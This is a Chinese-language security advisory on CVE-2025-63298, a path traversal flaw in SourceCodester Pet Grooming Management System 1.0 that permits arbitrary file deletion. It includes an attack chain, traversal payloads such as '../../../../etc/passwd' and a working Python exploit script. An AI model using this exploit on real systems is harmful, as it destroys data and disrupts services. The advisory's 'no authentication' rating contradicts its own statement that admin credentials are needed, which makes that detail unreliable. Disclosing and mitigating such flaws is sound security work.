CVE-2025-63298 SourceCodester宠物美容系统路径遍历漏洞导致任意文件删除

漏洞信息

漏洞编号

CVE-2025-63298

漏洞类型

路径遍历

CVSS评分

8.2 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

SourceCodester Pet Grooming Management System 1.0

漏洞概述

CVE-2025-63298是SourceCodester Pet Grooming Management System 1.0中存在的严重安全漏洞。该漏洞位于admin/manage_website.php组件中，属于典型的路径遍历（Path Traversal）漏洞。攻击者利用此漏洞可以通过精心构造的POST请求，实现对服务器文件系统任意位置的访问，并删除任意文件。此漏洞的CVSS评分为8.2（高危），主要影响系统的机密性和可用性。攻击者需要具备管理员权限才能成功利用此漏洞，但一旦被利用，可能导致系统文件被篡改、服务中断等严重后果。由于宠物美容管理系统通常包含客户信息、预约记录、财务数据等敏感信息，漏洞的存在可能为组织带来数据泄露和业务中断的双重风险。

技术细节

该路径遍历漏洞存在于admin/manage_website.php文件中的文件删除功能模块。漏洞的根本原因在于应用程序对用户输入的文件路径缺少充分的验证和过滤，允许攻击者通过构造特殊的文件路径字符序列（如../）来突破预期的目录限制。在正常情况下，文件删除功能应该只允许删除预定义的网站配置文件或资源文件。然而，由于缺乏对路径参数的严格校验，攻击者可以构造类似../../../../etc/passwd或../../boot.ini这样的路径，成功遍历到系统关键文件目录。一旦路径被解析，攻击者即可通过POST请求触发文件删除操作，导致Web服务器或底层操作系统中的任意文件被删除，从而造成服务中断或系统瘫痪。

攻击链分析

STEP 1

步骤1

攻击者获取目标系统的管理员账户凭据

STEP 2

步骤2

使用有效凭据登录Pet Grooming Management System管理后台

STEP 3

步骤3

构造包含路径遍历序列的恶意POST请求，目标是admin/manage_website.php

STEP 4

步骤4

在file_path参数中注入类似../../../../etc/passwd的路径遍历载荷

STEP 5

步骤5

服务器端应用程序未正确验证路径参数，解析并执行文件删除操作

STEP 6

步骤6

目标系统关键文件被删除，导致服务中断或系统完全瘫痪

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-63298 PoC - Path Traversal in Pet Grooming Management System
# Target: SourceCodester Pet Grooming Management System 1.0
# Component: admin/manage_website.php

def exploit(target_url, username, password, file_to_delete):
    """
    Exploit path traversal vulnerability to delete arbitrary files
    """
    # Login to obtain authenticated session
    login_url = target_url + '/admin/login.php'
    login_data = {
        'username': username,
        'password': password
    }
    
    session = requests.Session()
    login_response = session.post(login_url, data=login_data)
    
    if 'admin' not in login_response.text.lower():
        print('[-] Login failed')
        return False
    
    print('[+] Login successful')
    
    # Exploit path traversal to delete arbitrary file
    exploit_url = target_url + '/admin/manage_website.php'
    
    # Construct malicious path with traversal sequences
    malicious_path = '../../../../' + file_to_delete
    
    exploit_data = {
        'action': 'delete',
        'file_path': malicious_path
    }
    
    response = session.post(exploit_url, data=exploit_data)
    
    if response.status_code == 200:
        print(f'[+] File deletion attempt sent: {file_to_delete}')
        return True
    else:
        print('[-] Exploitation failed')
        return False

if __name__ == '__main__':
    if len(sys.argv) < 5:
        print(f'Usage: python {sys.argv[0]} <target_url> <username> <password> <file_to_delete>')
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    file_path = sys.argv[4]
    
    exploit(target, user, pwd, file_path)

影响范围

SourceCodester Pet Grooming Management System 1.0

防御指南

临时缓解措施

在供应商发布官方修复补丁之前，可采取以下临时缓解措施：1）限制管理后台的访问IP，仅允许受信任的网络段访问；2）启用双因素认证增强管理员账户安全性；3）禁用或限制文件删除功能的使用；4）对所有文件操作日志进行实时监控和告警；5）定期备份系统和关键数据，确保在遭受攻击后能够快速恢复服务。